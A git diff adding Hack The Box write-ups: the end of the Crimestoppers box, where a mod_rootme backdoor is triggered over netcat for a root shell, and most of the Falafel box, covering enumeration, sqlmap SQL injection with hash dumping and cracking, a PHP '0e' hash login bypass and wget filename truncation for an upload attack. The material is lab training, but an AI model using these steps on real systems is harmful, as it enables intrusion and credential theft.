+ 10.10.10.80 - - [22/Dec/2017:10:17:34 -0800] "Get FunSociety" 400 301 "-" "-"
+ ::1 - - [23/Dec/2017:14:39:17 -0800] "get root" 400 301 "-" "-"
+ ::1 - - [23/Dec/2017:14:40:53 -0800] "get-root" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:41:02 -0800] "root" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:43:28 -0800] "HackTheBox" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:43:34 -0800] "darkarmy" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:46:50 -0800] "WhiteRose@DarkArmy.htb" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:48:09 -0800] "HackTheBox" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:48:30 -0800] "/var/www/html/uploads/whiterose.txt" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:51:37 -0800] "bash" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:57:40 -0800] "rootme" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:04:41 -0800] "hACKtHEbOX" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:04:52 -0800] "DmogXdiNct" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:04 -0800] "ElnfYehObu" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:12 -0800] "FomeZfkLav" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:21 -0800] "dMOGxDInCT" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:33 -0800] "eLNFyEHoBU" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:46 -0800] "fOMEzFKlAV" 400 0 "-" "-"
+
+
+
+And when we take a look at apache's access logs we see a bunch of requests that have been made with the passphrase **FunSociety** and **get-root** so we put the pieces together by taking a look at the modrootme github repository [here](https://github.com/sajith/mod-rootme): and we see that we need to do the following:
+
+
+ nc localhost 80
+ get root
+ id
+
+
+
+So let's try it:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/15 ] [~/HTB/Crimestoppers]
+ → nc 10.10.10.80 80
+ GET FunSociety
+ rootme-0.5 DarkArmy Edition Ready
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ root@ubuntu:/# cd ~
+ cd ~
+
+ root@ubuntu:/root# cat root.txt
+ cat root.txt
+ 6fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/9.md b/Hard/9.md
new file mode 100644
index 0000000..cb8b4ee
--- /dev/null
+++ b/Hard/9.md
@@ -0,0 +1,1144 @@
+# Falafel Writeup
+
+
+
+## Introduction :
+
+Falafel is a hard linux box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Falafel]
+ → sudo nmap -vvv -sTU -p- 10.10.10.73 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 22/tcp on 10.10.10.73
+ Discovered open port 80/tcp on 10.10.10.73
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Falafel]
+ → sudo nmap -sCV -p22,80 10.10.10.73
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 11:47 CET
+ Nmap scan report for 10.10.10.73
+ Host is up (0.040s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
+ | 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
+ |_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-robots.txt: 1 disallowed entry
+ |_/*.txt
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Falafel Lovers
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we are hinted at 2 things : First the login page top right and the username "IT" at the domain name "falafel.htb". So let's check out the login page which is a php page:
+
+
+
+So here we try a standard SQL injection **' or 1=1**
+
+
+
+next we'll try something random **nothing:nowhere** :
+
+
+
+And here we get a different error message "Try again.." so we can see here that using the admin username gives us a different error message. so let's enumerate this with gobuster and wfuzz:
+
+
+ apt install seclists -y
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -u http://10.10.10.73
+
+
+
+Let gobuster run in the background, and let's check what the post request exactly is from burpsuite:
+
+
+
+So here we see it is a POST request to login.php with the parameters **username** and **password**
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → cp /usr/share/seclists/Usernames/Names/names.txt .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → l
+ total 80K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 13:14 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+now we're going to use seclists' names.txt wordlist with wfuzz:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → wfuzz -c -z files,names.txt --sc 200 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~]
+ → wfuzz -c -w names.txt --sc 200 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php 2>/dev/null
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.73/login.php
+ Total requests: 10177
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000003: 200 102 L 657 W 7074 Ch "aarika"
+ 000000018: 200 102 L 657 W 7074 Ch "abdallah"
+ 000000017: 200 102 L 657 W 7074 Ch "abdalla"
+ 000000015: 200 102 L 657 W 7074 Ch "abby"
+ 000000014: 200 102 L 657 W 7074 Ch "abbie"
+ 000000007: 200 102 L 657 W 7074 Ch "abagael"
+ 000000001: 200 102 L 657 W 7074 Ch "aaliyah"
+ 000000011: 200 102 L 657 W 7074 Ch "abbe"
+ 000000010: 200 102 L 657 W 7074 Ch "abbas"
+ 000000008: 200 102 L 657 W 7074 Ch "abagail"
+ 000000009: 200 102 L 657 W 7074 Ch "abahri"
+ 000000005: 200 102 L 657 W 7074 Ch "aartjan"
+ 000000006: 200 102 L 657 W 7074 Ch "aarushi"
+ 000000002: 200 102 L 657 W 7074 Ch "aaren"
+ 000000021: 200 102 L 657 W 7074 Ch "abe"
+ 000000049: 200 102 L 657 W 7074 Ch "adalyn"
+ 000000025: 200 102 L 657 W 7074 Ch "abigael"
+ 000000060: 200 102 L 657 W 7074 Ch "addy"
+ 000000033: 200 102 L 657 W 7074 Ch "abriel"
+ 000000004: 200 102 L 657 W 7074 Ch "aaron"
+ 000000019: 200 102 L 657 W 7074 Ch "abdul"
+ 000000058: 200 102 L 657 W 7074 Ch "addison"
+ 000000055: 200 102 L 657 W 7074 Ch "addia"
+ 000000054: 200 102 L 657 W 7074 Ch "addi"
+ 000000056: 200 102 L 657 W 7074 Ch "addie"
+ 000000053: 200 102 L 657 W 7074 Ch "adda"
+ 000000057: 200 102 L 657 W 7074 Ch "addilyn"
+ 000000059: 200 102 L 657 W 7074 Ch "addons"
+ 000000051: 200 102 L 657 W 7074 Ch "adan"
+ 000000048: 200 102 L 657 W 7074 Ch "adaline"
+ 000000050: 200 102 L 657 W 7074 Ch "adam"
+ 000000047: 200 102 L 657 W 7074 Ch "adalia"
+ 000000046: 200 102 L 657 W 7074 Ch "adair"
+ 000000045: 200 102 L 657 W 7074 Ch "adah"
+ 000000052: 200 102 L 657 W 7074 Ch "adara"
+ ^C
+ Total time: 0
+ Processed Requests: 35
+ Filtered Requests: 0
+ Requests/sec.: 0
+
+
+
+Now we see that we get alot of responses that are all 657Words long, but as you can see they are not the usernames we want like the username admin we found earlier. Since we know admin username got us a different response, it's safe to assume this is not the same length as 657 so we're going to filter out the responses that are 657 words long:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → wfuzz -c -w names.txt --hw 657 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php 2>/dev/null
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.73/login.php
+ Total requests: 10177
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000086: 200 102 L 659 W 7091 Ch "admin"
+ 000001886: 200 102 L 659 W 7091 Ch "chris"
+ ^C
+ Total time: 0
+ Processed Requests: 2603
+ Filtered Requests: 2601
+ Requests/sec.: 0
+
+
+
+And there we have it, so we have 2 usernames : admin and chris. In the meantime, gobuster finished in the background, and we get a few interesting pages:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -u http://10.10.10.73
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.73
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,php
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/12/21 13:08:51 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /index.php (Status: 200)
+ /login.php (Status: 200)
+ /profile.php (Status: 302)
+ /uploads (Status: 301)
+ /header.php (Status: 200)
+ /assets (Status: 301)
+ /footer.php (Status: 200)
+ /upload.php (Status: 302)
+ /css (Status: 301)
+ /style.php (Status: 200)
+ /js (Status: 301)
+ /logout.php (Status: 302)
+ /robots.txt (Status: 200)
+ **/cyberlaw.txt (Status: 200)**
+ /connection.php (Status: 200)
+ /server-status (Status: 403)
+ Progress: 173551 / 220561 (78.69%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2020/12/21 13:41:18 Finished
+ ===============================================================
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → curl http://10.10.10.73/cyberlaw.txt
+ From: Falafel Network Admin (admin@falafel.htb)
+ Subject: URGENT!! MALICIOUS SITE TAKE OVER!
+ Date: November 25, 2017 3:30:58 PM PDT
+ To: lawyers@falafel.htb, devs@falafel.htb
+ Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
+ Mime-Version: 1.0
+ X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
+ X-Spam-Level: ***
+
+ A user named "chris" has informed me that he could log into MY account without knowing the password,
+ then take FULL CONTROL of the website using the image upload feature.
+ We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
+ so I have no idea how he did it.
+
+ Dear lawyers, please handle him. I believe Cyberlaw is on our side.
+ Dear develpors, fix this broken site ASAP.
+
+ ~admin%
+
+
+Here we also see chris' username, and we get hinted at an image upload exploitation. So let's try to find chris' password. we could do it with hydra, but we'll try to get it through sql injection using sqlmap:
+
+ 
+
+Here i saved it as login.req to pass it to sqlmap:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → l
+ total 84K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 13:54 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 -p username,password
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.12#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [)]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 13:55:41 /2020-12-21/
+
+ [13:55:41] [INFO] parsing HTTP request from 'login.req'
+ [13:55:41] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [13:55:41] [INFO] testing connection to the target URL
+ [13:55:41] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [13:55:41] [INFO] testing if the target URL content is stable
+ [13:55:42] [INFO] target URL content is stable
+ [13:55:42] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
+ [13:55:42] [INFO] testing for SQL injection on POST parameter 'username'
+ [13:55:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [...]
+
+
+Basically here sqlmap finds nothing so you need to tell sqlmap that there is an error message that isn't what we want and that is "Wrong identification : username" or in short "Wrong identification" so we specify that and let it run again:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 --string "Wrong identification" -p username,password
+ ___
+ __H__
+ ___ ___[)]_____ ___ ___ {1.4.12#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:00:21 /2020-12-21/
+
+ [14:00:21] [INFO] parsing HTTP request from 'login.req'
+ [14:00:21] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [14:00:21] [INFO] testing connection to the target URL
+ [14:00:21] [INFO] testing if the provided string is within the target URL page content
+ [14:00:21] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
+ [14:00:21] [INFO] testing for SQL injection on POST parameter 'username'
+ [14:00:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [14:00:22] [INFO] POST parameter 'username' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
+ [...]
+
+ [14:00:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
+ [14:00:50] [INFO] checking if the injection point on POST parameter 'username' is a false positive
+ POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 538 HTTP(s) requests:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: username=chris' AND 3892=3892-- yJzw&password;=password
+ ---
+ [14:00:51] [INFO] testing MySQL
+ [14:00:51] [INFO] confirming MySQL
+ [14:00:51] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.0
+ [14:00:52] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.73'
+
+ [*] ending @ 14:00:52 /2020-12-21/
+
+
+And basically here we see that sqlmap found a Boolean-based blind vulnerability. so we're going to make sqlmap dump the results:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 --string "Wrong identification" -p username,password --dump
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.12#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [.]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:02:54 /2020-12-21/
+
+ [14:02:54] [INFO] parsing HTTP request from 'login.req'
+ [14:02:54] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [14:02:54] [INFO] resuming back-end DBMS 'mysql'
+ [14:02:54] [INFO] testing connection to the target URL
+ [14:02:55] [INFO] testing if the provided string is within the target URL page content
+ sqlmap resumed the following injection point(s) from stored session:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: username=chris' AND 3892=3892-- yJzw&password;=password
+ ---
+ [14:02:55] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL 5
+ [14:02:55] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
+ [14:02:55] [INFO] fetching current database
+ [14:02:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
+ [14:02:55] [INFO] retrieved: falafel
+ [14:02:57] [INFO] fetching tables for database: 'falafel'
+ [14:02:57] [INFO] fetching number of tables for database 'falafel'
+ [14:02:57] [INFO] retrieved: 1
+ [14:02:58] [INFO] retrieved: users
+ [14:02:59] [INFO] fetching columns for table 'users' in database 'falafel'
+ [14:02:59] [INFO] retrieved: 4
+ [14:03:00] [INFO] retrieved: ID
+ [14:03:01] [INFO] retrieved: username
+ [14:03:03] [INFO] retrieved: password
+ [14:03:06] [INFO] retrieved: role
+ [14:03:08] [INFO] fetching entries for table 'users' in database 'falafel'
+ [14:03:08] [INFO] fetching number of entries for table 'users' in database 'falafel'
+ [14:03:08] [INFO] retrieved: 2
+ [14:03:08] [INFO] retrieved: 1
+ [14:03:09] [INFO] retrieved: 0e462096931906507119562988736854
+ [14:03:21] [INFO] retrieved: admin
+ [14:03:23] [INFO] retrieved: admin
+ [14:03:25] [INFO] retrieved: 2
+ [14:03:26] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
+ [14:03:39] [INFO] retrieved: normal
+ [14:03:41] [INFO] retrieved: chris
+ [14:03:43] [INFO] recognized possible password hashes in column 'password'
+ do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
+ do you want to crack them via a dictionary-based attack? [Y/n/q] Y
+ [14:03:43] [INFO] using hash method 'md5_generic_passwd'
+ what dictionary do you want to use?
+ [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
+ [2] custom dictionary file
+ [3] file with list of dictionary files
+ > 1
+ [14:03:43] [INFO] using default dictionary
+ do you want to use common password suffixes? (slow!) [y/N] N
+ [14:03:43] [INFO] starting dictionary-based cracking (md5_generic_passwd)
+ [14:03:43] [INFO] starting 4 processes
+ [14:03:47] [INFO] cracked password 'juggling' for user 'chris'
+ Database: falafel
+ Table: users
+ [2 entries]
+ +----+--------+---------------------------------------------+----------+
+ | ID | role | password | username |
+ +----+--------+---------------------------------------------+----------+
+ | 1 | admin | 0e462096931906507119562988736854 | admin |
+ | 2 | normal | d4ee02a22fc872e36d9e3751ba72ddc8 (juggling) | chris |
+ +----+--------+---------------------------------------------+----------+
+
+ [14:03:53] [INFO] table 'falafel.users' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.73/dump/falafel/users.csv'
+ [14:03:53] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.73'
+
+ [*] ending @ 14:03:53 /2020-12-21/
+
+
+And we got password hashes and sqlmap cracked chris' hash for us, and thus we get the credentials **chris:juggling**! Of course it couldn't crack the admin hash otherwise that would be too easy, so let's login as chris:
+
+
+
+We get login successful, and we are now logged in as the chris user:
+
+
+
+And here there was a hint towards php hash collisions, basically when you look at the admin password's hash that sqlmap found earlier:
+
+
+ +----+--------+---------------------------------------------+----------+
+ | ID | role | password | username |
+ +----+--------+---------------------------------------------+----------+
+ | 1 | admin | 0e462096931906507119562988736854 | admin |
+ | 2 | normal | d4ee02a22fc872e36d9e3751ba72ddc8 (juggling) | chris |
+ +----+--------+---------------------------------------------+----------+
+
+
+
+You see that it begins with 0e and in php, when you use == it gets treated as 0 exponential whatever, and the result of 0^n will always be 0. therefore you need to use === to avoid it from being treated as 0 exponential something. Therefore, let's find any hash that begins with 0e such as the ones shown on this [page](https://news.ycombinator.com/item?id=9484757):
+
+
+
+Basically here you see that there are multiple md5 hashes that begin with 0e so theorically, it is possible that by using one of these passwords , the php interpreter would consider them as equal because 0eWhatever will always be the same with == so let's try **admin:240610708**
+
+
+
+And we this was successful ! From here we are prompted by the image url upload that was mentionned earlier in cyberlaw.txt Now let's get the box to connect back to us by requesting an image:
+
+
+
+Here was a rabbithole where wget being version 1.17.1 where it should be exploitable (40064.txt)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~]
+ → cat $(locate 40064.txt)
+ =============================================
+ - Release date: 06.07.2016
+ - Discovered by: Dawid Golunski
+ - Severity: High
+ - CVE-2016-4971
+ =============================================
+
+
+ I. VULNERABILITY
+ -------------------------
+
+ GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
+
+
+
+
+Basically this bug was about abusing wget's redirect feature to a ftp page to serve a different filename, such as getting an url that ends in .gif to make it download a php file, however for some reason it doesn't work on this box, so the intended solution was as follows:
+
+Going back at the profile page of admin we see a hint "Know your limits"
+
+
+
+Basically this is a hint towards wget's character limits
+
+
+
+And on linux the maximum filename length limit is 255 characters. So let's create a 255-character-long pattern :
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → locate pattern_create
+ /usr/bin/msf-pattern_create
+ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
+ Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
+
+
+However it needs to end in .gif, that's 4 characters, so remove 4 characters and add .gif at the end:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → mv Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 84K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 14:44 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 0 Dec 21 14:42 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+So now that we have our 255 char long filename ending in .gif, we're going to give it the GIF magic bytes so that it gets considered as an actual GIF image:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo 'GIF8;' >> Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo 'Ippsec Is Awesome' >> Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
